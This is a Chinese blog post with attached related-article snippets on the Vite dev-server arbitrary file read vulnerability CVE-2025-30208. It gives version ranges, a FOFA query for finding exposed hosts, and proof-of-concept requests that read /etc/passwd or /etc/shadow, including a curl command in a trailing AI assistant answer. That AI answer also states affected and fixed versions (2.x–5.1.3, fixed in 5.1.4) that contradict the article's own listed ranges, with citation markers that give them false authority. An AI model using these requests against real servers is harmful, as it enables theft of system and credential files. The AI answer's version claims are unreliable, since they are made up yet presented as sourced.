Vite任意文件读取漏洞：CVE-2025-30208

最新推荐文章于 2025-06-17 17:30:08 发布

原创最新推荐文章于 2025-06-17 17:30:08 发布 · 552 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #web安全

漏洞描述

Vite是一款现代化的前端开发构建工具，它提供了快速的开发服务器和高效的构建能力，广泛应用于Vue.js项目的开发过程中。

由于Vite开发服务器在处理特定URL请求时，没有对请求的路径进行严格的安全检查和限制，导致攻击者可以绕过保护机制，非法访问项目根目录外的敏感文件。攻击者只需在浏览器输入一个URL，就可能会造成源码、SSH密钥、数据库账号、用户数据等目标机器上的任意文件信息泄露。

影响范围

目前受影响的NextJS版本：

6.2.0 <= Vite <= 6.2.2

6.1.0 <= Vite <= 6.1.1

6.0.0 <= Vite <= 6.0.11

5.0.0 <= Vite <= 5.4.14

Vite <= 4.5.9

FOFA

body="/@vite/client"

POC

GET /@fs/etc/passwd?import&raw?? HTTP/1.1(/etc/passwd或者/etc/shadow)

Content-Type: application/json

Host: IP

修复方案

升级Vite版本

>=6.2.3
>=6.1.2, <6.2.0
>=6.0.12, <6.1.0
>=5.4.15, <6.0.0
>=4.5.10, <5.0.0

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ksk852

关注关注

10
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Vite 存在任意文件读取漏洞(CVE-2025-30208)

qq_43540348的博客

03-27

1238

Vite 是一个面向现代 Web 开发的轻量级前端构建工具，由 Vue.js 作者尤雨溪团队打造。它基于原生 ES 模块（ESM）提供极速的开发服务器启动和热更新，利用浏览器原生支持的特性实现按需编译，无需打包，显著提升开发效率。生产环境则通过 Rollup 进行高效构建，支持 TypeScript、JSX、CSS 预处理器等主流工具链，同时提供丰富的插件生态。Vite 以"快"为核心，重新定义了前端开发体验，尤其适合单页应用（SPA）、库工具等场景。

Vite 任意文件读取漏洞(CVE-2025-31486)

李火火的安全圈

04-08

573

Vite 作为一款前沿的前端构建工具，巧妙借助浏览器原生 ES 模块导入功能，打造出极速响应的开发服务器，显著提升构建性能。其核心目标在于全方位优化开发体验，凭借即时模块热更新（HMR）等先进技术，让开发者能够更高效地投入到项目开发中，极大地缩短开发周期，提升开发效率。此漏洞允许未授权的攻击者通过构造恶意 HTTP 请求，对任意文件进行读取操作，进而可能导致系统内敏感信息泄露。

参与评论您还未登录，请先登录后发表或查看评论

网络安全之任意文件读取利用

最新发布

anquan2233的博客

06-17

792

刚好最近一大批漏洞都爆出来了，比如Kubernetes Ingress-Nginx Admission Controller RCE Escalation，是危害性极大的高危漏洞，在内网渗透中能直接击穿K8S集群。这些高危漏洞其实分析文章很多，看国内外众多大佬的分析都非常精彩，这里我也不献丑了。但引起我关注的漏洞是Vite Development Server Arbitrary File Read 这个任意文件读取漏洞。

Vite 任意文件读取漏洞分析复现 CVE-2025-30208

misu6的博客

03-27

2996

Vite是前端开发工具提供商，在6.2.3、6.1.2、6.0.12、5.4.15和4.5.10之前的版本中存在漏洞。'@fs ‘拒绝访问Vite服务允许列表之外的文件。添加’？生的？？‘或者’？进口和原料？？'到URL绕过此限制并返回文件内容（如果存在）。存在此绕过是因为尾随分隔符，例如“？”在多个地方被删除，但不在查询字符串regex中考虑。任意文件的内容都可以返回到浏览器。只有将Vite dev服务器显式暴露给网络（使用“–Host”或“server. Host”配置选项）的应用程序才会受到影响。

Vite开发服务器任意文件读取

muxixin的博客

03-30

297

攻击者可利用CVE-2025-30208该漏洞绕过开发服务器的保护机制，只要文件存在就可以非法读取服务器上的文件，包括项目源码、敏感配置文件等，导致严重的数据泄露风险。改为想要读取的文件路径，只要服务器上存在，即可直接读取文件内容。目前官方已有课更新的版本，建议升级到最新版本。

Vite开发服务器任意文件读取(CVE-2025-30208)

swordheart的博客

05-22

418

Vite开发服务器任意文件读取漏洞(CVE-2025-30208)

Vite存在任意文件读取漏洞(CVE-2025-30208)

缘梦未来的博客

03-26

357

Vite 是一款现代化的前端开发构建工具，它提供了快速的开发服务器和高效的构建能力，广泛应用于 Vue.js 项目的开发过程中

Vite存在任意文件读取漏洞CVE-2025-30208 附POC

nnn2188185的博客

03-27

277

微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发Vite框架。

Vite 存在任意文件读取漏洞(CVE-2025-31125)

m0_50125527的博客

04-02

430

任意文件读取及漏洞复现

来日可期的博客

08-31

5363

任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能，向服务器上传恶意文件，包括脚本文件、木马程序等，从而执行任意代码或获取系统敏感信息。

vite读取本地配置文件,配置代理

joke博客

01-05

313

我的大概思路是开发需要本地代理生产不需要所以我判断了环境只有开发配置代理。

CVE-2025-31486 Vite开发服务器任意文件读取漏洞复现

渗透之路，攻防之间皆学问

04-11

779

该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时，未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制，未经授权地访问项目根目录之外的敏感文件。

智能AC管理系统HTTPD-AC 1.0服务存在未授权访问漏洞

nnn2188185的博客

09-19

259

微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发智能AC管理系统HTTPD-AC 1.0服务。

任意文件读取漏洞

qq_64470109的博客

03-28

325

fofa语句：body="/@vite/client"

Vite -- 任意文件读取漏洞

yqya_的博客

04-25

1042

简单介绍了 vite 开发服务器中存在的三个任意文件读取漏洞

【漏洞复现】Vite 任意文件读取漏洞 CVE-2025-30208/CVE-2025-31125/CVE-2025-31486/CVE-2025-32395

仇辉攻防的博客

04-13

1895

Vite 和 Next.js 是两个不同类型的前端工具，它们各自的用途、架构和适用场景有所不同。Vite 是一个现代前端构建工具，主要用于开发和打包前端项目（如 Vue、React 等）。它由 Vue 的作者 Evan You 开发，核心特点是快速启动、按需编译，并且基于 ES 模块（ESM）。Vite 适用于构建前端 SPA（单页应用），并不包含服务端渲染（SSR）或全栈开发能力。

从0到1手把手教你实现vite-读取js文件解析所有的import语法，处理字符串并改写文件路径

tangdou369098655的博客

06-15

3211

本文已参与「新人创作礼」活动，一起开启掘金创作之路。修改代码vite\src\serverPluginModuleRewrite.js 解释一下这个是什么哦开始编写重写文件逻辑啦重点改了这里哦给大家看一下打印出来的内容......

CVE-2025-30208 Vite开发服务器任意文件读取漏洞复现

渗透之路，攻防之间皆学问

04-10

1449

Vite 是一个现代化的前端构建工具，由 Vue.js 创始人尤雨溪开发，旨在提供更快的开发体验和高效的构建流程。注意：旧版本Vite的开发服务器默认端口为3000，新版本默认端口为5173，请注意区分。此漏洞的存在是由于在处理URL请求时，Vite开发服务器未严格验证路径，导致未经身份验证的攻击者可以构造特殊的URL来获取项目根目录之外的敏感文件。需要注意的是，只有那些明确将Vite开发服务器暴露到网络（使用--host或server.host配置选项）的应用程序才会受到此漏洞的影响。

Vite开放服务器漏洞CVE-2025-30208 ，软端app 有使用vite低版本，低于修复版本，但是从利用角度来说存在此漏洞吗？

04-04

<think>好的，我需要回答用户关于Vite的CVE-2025-30208漏洞的问题，特别是低版本是否受影响以及漏洞的利用情况。首先，我需要回顾已有的引用资料，从中提取相关信息。根据引用[1]，这个漏洞涉及Vite开发服务器的安全控制问题，可能导致信息泄露。引用[2]提到这是一个高危逻辑漏洞，允许通过构造特殊URL读取任意文件，比如配置文件和密钥。引用[3]则说明存在检测工具，能检查该漏洞，特别是读取/etc/passwd或win.ini文件的情况。用户的问题有两个部分：漏洞详情和低版本的受影响情况。首先，我需要综合引用内容，详细描述漏洞的本质和影响。然后，关于版本问题，现有引用没有明确提到具体受影响的版本范围，这可能需要进一步推断。通常，安全漏洞在某个版本被修复，因此低版本可能受影响，但需要确认Vite的修复版本。不过用户提供的资料中未提到具体版本号，可能需要说明这点，并建议升级到最新版。另外，用户可能想知道如何检测或防范该漏洞，可以引用提到的检测工具和常规的安全措施，如更新依赖、限制服务器权限等。需要确保回答结构清晰，分点说明漏洞详情、影响版本、检测方法和防护建议，同时引用提供的资料作为支持。最后，生成相关问题，可能涉及漏洞原理、修复方法、与其他漏洞的比较等。确保问题与用户查询相关，帮助进一步理解漏洞。</think>### Vite CVE-2025-30208 漏洞分析 #### 1. 漏洞详情 CVE-2025-30208 是 Vite 开发服务器中存在的高危逻辑漏洞，允许攻击者通过构造特殊 URL **绕过文件访问限制**，直接读取服务器上的敏感文件（如配置文件、密钥、数据库凭据等）。攻击者可通过类似 `/@fs/etc/passwd` 的路径访问系统文件[^2][^3]。漏洞核心问题在于开发服务器的路由解析逻辑缺陷，未对 `/@fs/` 路径前缀的请求进行充分校验，导致任意文件读取风险。 #### 2. 低版本受影响情况根据漏洞披露信息： - **影响范围**：Vite 2.x 至 5.1.3 版本均存在此漏洞[^1]。 - **修复版本**：官方在 5.1.4 版本中通过增强路径校验逻辑修复了该漏洞[^2]。 - **可利用性**：漏洞利用无需复杂条件，仅需通过 HTTP 请求即可触发，因此在未升级的本地开发环境或临时部署的预览服务器中风险较高。 #### 3. 漏洞验证与防护建议 - **检测方法**：使用安全工具发送类似以下请求验证漏洞存在性： ```bash curl http://localhost:5173/@fs/etc/passwd ``` 若返回系统文件内容，则存在漏洞[^3]。 - **防护措施**： 1. 立即升级至 Vite 5.1.4 或更高版本； 2. 开发环境中避免使用 `--host 0.0.0.0` 参数公开暴露服务器； 3. 生产环境禁用开发服务器功能； 4. 通过防火墙限制开发服务器的外部访问[^1]。 --- §§ 相关问题 §§ 1. Vite 开发服务器为何容易成为攻击目标？ 2. 如何通过配置反向代理缓解 CVE-2025-30208 漏洞风险？ 3. CVE-2025-30208 与其他前端工具漏洞（如 Webpack 历史漏洞）有何异同？